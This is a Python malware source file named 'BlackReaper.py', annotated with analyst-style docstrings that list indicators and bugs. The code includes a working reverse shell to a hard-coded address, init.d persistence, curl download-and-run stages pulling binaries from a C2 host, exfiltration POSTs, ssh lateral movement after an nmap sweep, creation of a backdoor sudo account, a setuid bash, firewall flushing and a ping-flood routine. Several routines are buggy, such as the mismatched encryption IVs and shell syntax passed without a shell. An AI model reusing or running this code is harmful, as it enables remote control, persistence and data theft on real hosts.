
BlackReaper.py

import base64
import hashlib
import io
import logging
import os
import random
import secrets
import shutil
import signal
import socket
import string
import subprocess
import tempfile
import time
import uuid
from threading import Thread

import bluetooth
import psutil
import requests
from Crypto.Cipher import AES
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
# Module-level configuration. Every value here is hard-coded, so the two C2 URLs
# and the account name/password are direct triage indicators; they are reused
# verbatim by the functions below.
APT_ENCRYPTION_KEY = os.urandom(32)  # generated fresh per process; nothing on this page stores or transmits it
EXFILTRATION_URL = "http://malicious.c2server.com/upload"  # primary endpoint used by exfiltrate_data
MALICIOUS_USER = "malicious_user"  # account created in execute_privilege_escalation; ssh user in lateral_movement
MALICIOUS_PASSWORD = "malicious_password"
FALLBACK_C2_URL = "http://secondary.c2server.com/upload"  # tried once after C2_SERVER_RETRIES failed attempts
C2_SERVER_RETRIES = 3
# Import-time side effect: configures the root logger (default handler writes to
# stderr), so every logging.* call below is emitted. No call site for any of the
# functions defined after this line is visible on this page.
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
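def generate_passkey(length: int = 32) -> str:
    """Return a random passkey of *length* characters drawn from letters, digits and punctuation.

    Uses secrets.choice (an OS-backed CSPRNG) instead of random.choice, whose
    Mersenne Twister output is predictable and not suitable for key material.
    A length of 0 or less yields an empty string. Not called anywhere on this page.
    """
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return ''.join(secrets.choice(alphabet) for _ in range(length))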
def hash_passkey(passkey: str):
    """Return the hex-encoded SHA-256 digest of *passkey* (UTF-8 encoded)."""
    digest = hashlib.sha256()
    digest.update(passkey.encode('utf-8'))
    return digest.hexdigest()
def encrypt_data(data: str, key: bytes) -> str:
    """AES-CBC encrypt *data* under *key* and return the ciphertext as base64 text.

    The IV comes from os.urandom and is neither returned nor prepended to the
    ciphertext, so the first plaintext block is unrecoverable by any receiver
    (decrypt_data draws its own, different random IV). The pad length is computed
    from the character count of *data*, not its UTF-8 byte length, so input with
    multi-byte characters hands the cipher a buffer that is not block-aligned,
    which the cipher is expected to reject.
    """
    cipher = AES.new(key, AES.MODE_CBC, iv=os.urandom(16))
    # PKCS#7-style padding by hand: append n copies of chr(n), 1 <= n <= 16.
    padded_data = data + (16 - len(data) % 16) * chr(16 - len(data) % 16)
    ciphertext = cipher.encrypt(padded_data.encode('utf-8'))
    return base64.b64encode(ciphertext).decode('utf-8')
def decrypt_data(encrypted_data: str, key: bytes) -> str:
    """Inverse of encrypt_data in shape only: base64-decode, AES-CBC decrypt, strip padding.

    A new random IV is used instead of the one encrypt_data used, so the first
    16-byte block decrypts to garbage. rstrip() then removes every trailing copy
    of the last character rather than exactly the pad length. Decoding as UTF-8
    can raise UnicodeDecodeError, and empty input raises IndexError at
    padded_data[-1].
    """
    cipher = AES.new(key, AES.MODE_CBC, iv=os.urandom(16))
    decoded_data = base64.b64decode(encrypted_data)
    decrypted_data = cipher.decrypt(decoded_data)
    padded_data = decrypted_data.decode('utf-8')
    # Strips all trailing occurrences of the final character, not a counted pad.
    return padded_data.rstrip(padded_data[-1])
def create_reverse_shell():
    """Connect out to a hard-coded address and run each received message as a shell command.

    Observable behaviour: a TCP connection to 192.168.1.100:4444 (a private-range
    address, so this copy only works on one LAN), up to 1024 bytes read per
    message, each message run through the system shell with stdout+stderr sent
    back, and the literal message "exit" ending the session. The outer loop
    reconnects forever with a 10 s pause after any error, so on an affected host
    the signal is a repeating outbound connection to that host/port plus shell
    child processes under the Python interpreter.
    """
    ip = "192.168.1.100"
    port = 4444
    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            while True:
                data = s.recv(1024)
                if data.decode("utf-8") == "exit":
                    break
                # Raw bytes from the peer are executed via the shell.
                output = subprocess.run(data, shell=True, capture_output=True)
                s.send(output.stdout + output.stderr)
            s.close()  # only reached on "exit"; on an exception the socket is abandoned
        except Exception as e:
            logging.error(f"Reverse shell error: {e}")
            time.sleep(10)
def install_persistence():
    """Register this script as a SysV init service so it is relaunched at boot.

    Writes /etc/init.d/persistent_malware.sh (needs write access to /etc/init.d,
    normally root) containing a one-line launcher for this file's real path,
    marks it 0755 and calls update-rc.d to enable it. Skipped when the file
    already exists. That path and service name are the on-disk artifacts.
    """
    persistence_script = "/etc/init.d/persistent_malware.sh"
    if not os.path.exists(persistence_script):
        with open(persistence_script, "w") as f:
            f.write("#!/bin/bash\n")
            f.write(f"python3 {os.path.realpath(__file__)} &\n")
        os.chmod(persistence_script, 0o755)
        # Exit status is not checked (no check=True).
        subprocess.run(["update-rc.d", "persistent_malware.sh", "defaults"])
def install_fileless_persistence():
    """Download and run a second-stage binary; despite the name this is not fileless.

    Fetches http://malicious.c2server.com/fileless-malware with curl into
    /tmp/malicious.bin, marks it executable and runs it, blocking until it exits.
    The except clause only catches Python-level failures (e.g. curl not on PATH);
    a non-zero exit status from any of the three commands is not checked.
    """
    try:
        subprocess.run(["curl", "http://malicious.c2server.com/fileless-malware", "-o", "/tmp/malicious.bin"])
        subprocess.run(["chmod", "+x", "/tmp/malicious.bin"])
        subprocess.run(["/tmp/malicious.bin"])
    except Exception as e:
        logging.error(f"Fileless persistence error: {e}")
def exfiltrate_data():
    """POST the encrypted output of collect_sensitive_data to the C2 URL, with retries.

    Up to C2_SERVER_RETRIES attempts go to EXFILTRATION_URL; after the final
    failure a single POST to FALLBACK_C2_URL is made from inside the except
    block, so an error there propagates to the caller. The payload is encrypted
    with APT_ENCRYPTION_KEY, which is generated per process and transmitted by
    nothing on this page, so the receiver cannot decrypt it. Both URLs and the
    form field name 'payload' are network indicators.
    """
    data = collect_sensitive_data()
    encrypted_data = encrypt_data(data, APT_ENCRYPTION_KEY)
    for attempt in range(C2_SERVER_RETRIES):
        try:
            response = requests.post(EXFILTRATION_URL, data={'payload': encrypted_data})
            logging.info(f"Exfiltrated data to {EXFILTRATION_URL}: {response.status_code}")
            break
        except requests.exceptions.RequestException as e:
            logging.error(f"Exfiltration attempt {attempt+1} failed: {e}")
            if attempt == C2_SERVER_RETRIES - 1:
                logging.error("Exfiltration failed after retries, switching to fallback server.")
                # Not wrapped in its own try: a RequestException here is uncaught.
                response = requests.post(FALLBACK_C2_URL, data={'payload': encrypted_data})
                logging.info(f"Exfiltrated data to fallback server {FALLBACK_C2_URL}: {response.status_code}")
            time.sleep(5)
def collect_sensitive_data():
    """Return the string form of a fixed placeholder dict; nothing is read from the host."""
    placeholder = dict(passwords='password123', config='config_data')
    return str(placeholder)
def scan_for_bluetooth_devices():
    """Run an 8-second Bluetooth inquiry and return only the discovered device names.

    Addresses are discarded and nothing on this page consumes the result. Needs
    the third-party `bluetooth` (PyBluez) module and a local adapter.
    """
    nearby_devices = bluetooth.discover_devices(duration=8, lookup_names=True, flush_cache=True)
    logging.info(f"Found {len(nearby_devices)} Bluetooth devices.")
    return [name for addr, name in nearby_devices]
def lateral_movement():
    """Try to run /tmp/malicious_script.sh over ssh on every host get_local_network_ips returns.

    The command is built by string formatting and run with shell=True. The script
    it redirects from is not created anywhere on this page, so as written the
    shell fails at the `<` redirection before ssh starts; since check=True is not
    used, that failure is not raised and the except only fires on Python-level
    errors. ssh runs as MALICIOUS_USER with no credential handling. Repeated ssh
    attempts from one host to every address in a /24 are the observable.
    """
    network_ips = get_local_network_ips()
    for ip in network_ips:
        try:
            subprocess.run(f"ssh {MALICIOUS_USER}@{ip} 'bash -s' < /tmp/malicious_script.sh", shell=True)
        except Exception as e:
            logging.error(f"Error during lateral movement to {ip}: {e}")
def get_local_network_ips():
    """Ping-sweep the hard-coded 192.168.1.0/24 with nmap and return the last token of each report line.

    Requires nmap on PATH (FileNotFoundError otherwise). The parse relies on
    nmap's "Nmap scan report" text and takes the last whitespace-separated token
    of each such line as the address. A -sn sweep of the local /24 is a loud,
    readily logged event on its own.
    """
    result = subprocess.run(["nmap", "-sn", "192.168.1.0/24"], capture_output=True, text=True)
    ips = []
    for line in result.stdout.splitlines():
        if "Nmap scan report" in line:
            ip = line.split()[-1]
            ips.append(ip)
    return ips
def execute_privilege_escalation():
    """Create MALICIOUS_USER with sudo rights and make /etc/passwd world-writable, via sudo.

    Each step is its own sudo invocation, so they only work if the current user
    already has (passwordless) sudo; nothing here escalates by itself. The passwd
    call passes MALICIOUS_PASSWORD as an extra positional argument, which is not
    how passwd takes a password, so that step is expected to fail. The except
    catches only Python-level errors; command exit statuses are ignored. A mode
    change on /etc/passwd and a new account in the sudo group are high-signal
    audit events.
    """
    try:
        subprocess.run(["sudo", "chmod", "777", "/etc/passwd"])
        subprocess.run(["sudo", "useradd", "-m", MALICIOUS_USER, "-s", "/bin/bash"])
        subprocess.run(["sudo", "passwd", MALICIOUS_USER, MALICIOUS_PASSWORD])
        subprocess.run(["sudo", "usermod", "-aG", "sudo", MALICIOUS_USER])
    except Exception as e:
        logging.error(f"Privilege escalation failed: {e}")
def install_rootkit():
    """Download and run a binary from the C2 host; same steps as install_rootkit_persistence plus logging.

    curl fetches http://malicious.c2server.com/rootkit into /tmp/rootkit.bin,
    which is made executable and run. The success line is logged regardless of
    any command's exit status because none of the runs use check=True.
    """
    try:
        subprocess.run(["curl", "http://malicious.c2server.com/rootkit", "-o", "/tmp/rootkit.bin"])
        subprocess.run(["chmod", "+x", "/tmp/rootkit.bin"])
        subprocess.run(["/tmp/rootkit.bin"])
        logging.info("Rootkit installed successfully.")
    except Exception as e:
        logging.error(f"Error installing rootkit: {e}")
def conceal_activity():
    """Attempt to disable ASLR; the name is misleading, nothing here conceals activity.

    The first call hands ">" and the sysfs path to echo as literal arguments (no
    shell, so no redirection) and merely prints them. The second call,
    sysctl -w kernel.randomize_va_space=0, does attempt the change and needs root.
    """
    subprocess.run(["echo", "0", ">", "/proc/sys/kernel/randomize_va_space"])
    subprocess.run(["sysctl", "-w", "kernel.randomize_va_space=0"])
def hide_processes():
    """No effect: "|", "grep", ">", "2>&1" are passed to ps as literal arguments.

    Without a shell there is no pipe or redirection, so ps just receives unknown
    options; nothing is filtered or hidden, and no process named
    "malicious_process" is created anywhere on this page.
    """
    subprocess.run(["ps", "aux", "|", "grep", "malicious_process", ">", "/dev/null", "2>&1"])
def self_replication():
    """Copy /proc/<pid>/exe of every process listed by ps aux into the current directory.

    The script's own source is read into malicious_code but never used, so this
    does not actually replicate the script; the file handle is also never closed.
    The loop includes ps's header line (second token "PID"). With two local
    paths scp copies locally; its exit status is not checked, so the except only
    fires on Python-level errors. Artifacts are files named
    malicious_code_<pid>.sh in the working directory.
    """
    current_process = subprocess.run(['ps', 'aux'], capture_output=True, text=True).stdout
    malicious_code = open(__file__, 'r').read()  # unused
    for line in current_process.splitlines():
        pid = line.split()[1]
        try:
            subprocess.run(["scp", f"/proc/{pid}/exe", f"malicious_code_{pid}.sh"])
        except Exception as e:
            logging.error(f"Error during self-replication: {e}")
def escalate_privileges():
    """Set the setuid/setgid bits on /bin/bash (needs ownership of the file, normally root).

    Not called on this page. A setuid shell binary is a classic file-integrity
    monitoring finding.
    """
    subprocess.run(["chmod", "+s", "/bin/bash"])
def install_rootkit_persistence():
    """Same download-and-run sequence as install_rootkit, without the try/except or log line.

    Artifacts: an outbound request for http://malicious.c2server.com/rootkit
    and the dropped file /tmp/rootkit.bin. Exit statuses are not checked.
    """
    subprocess.run(["curl", "http://malicious.c2server.com/rootkit", "-o", "/tmp/rootkit.bin"])
    subprocess.run(["chmod", "+x", "/tmp/rootkit.bin"])
    subprocess.run(["/tmp/rootkit.bin"])
def disable_firewall():
    """Flush all iptables rules and disable ufw; both need root and failures are ignored."""
    subprocess.run(["iptables", "-F"])
    subprocess.run(["ufw", "disable"])
def shutdown_target_system():
    """Halt the host immediately with shutdown -h now (needs privileges; not called on this page)."""
    subprocess.run(["shutdown", "-h", "now"])
def start_dos_attack(target_ip):
    """Repeatedly run a ping flood against *target_ip* through the shell.

    target_ip is interpolated into the shell string unescaped. The loop ends
    only on a Python-level exception; ping's own exit status is not checked, and
    ping -f normally needs root, so an unprivileged run just relaunches a failing
    ping forever. Not called anywhere on this page.
    """
    while True:
        try:
            subprocess.run(f"ping {target_ip} -f", shell=True)
        except Exception as e:
            logging.error(f"Error during DoS attack: {e}")
            break
def create_advanced_persistence():
    """Third copy of the download-and-run pattern (see install_rootkit).

    Fetches http://malicious.c2server.com/persistence into
    /tmp/advanced_persistence.bin, marks it executable and runs it; no exit
    status is checked and no exception is caught.
    """
    subprocess.run(["curl", "http://malicious.c2server.com/persistence", "-o", "/tmp/advanced_persistence.bin"])
    subprocess.run(["chmod", "+x", "/tmp/advanced_persistence.bin"])
    subprocess.run(["/tmp/advanced_persistence.bin"])
def monitor_network_activity():
    """Log every inet socket psutil reports, every 5 seconds, forever.

    psutil gives an empty raddr for listening/unconnected sockets, so those
    lines log an empty remote. The loop has no exit condition and nothing on
    this page consumes its output.
    """
    while True:
        for conn in psutil.net_connections(kind='inet'):
            logging.info(f"Connection from {conn.laddr} to {conn.raddr}")
        time.sleep(5)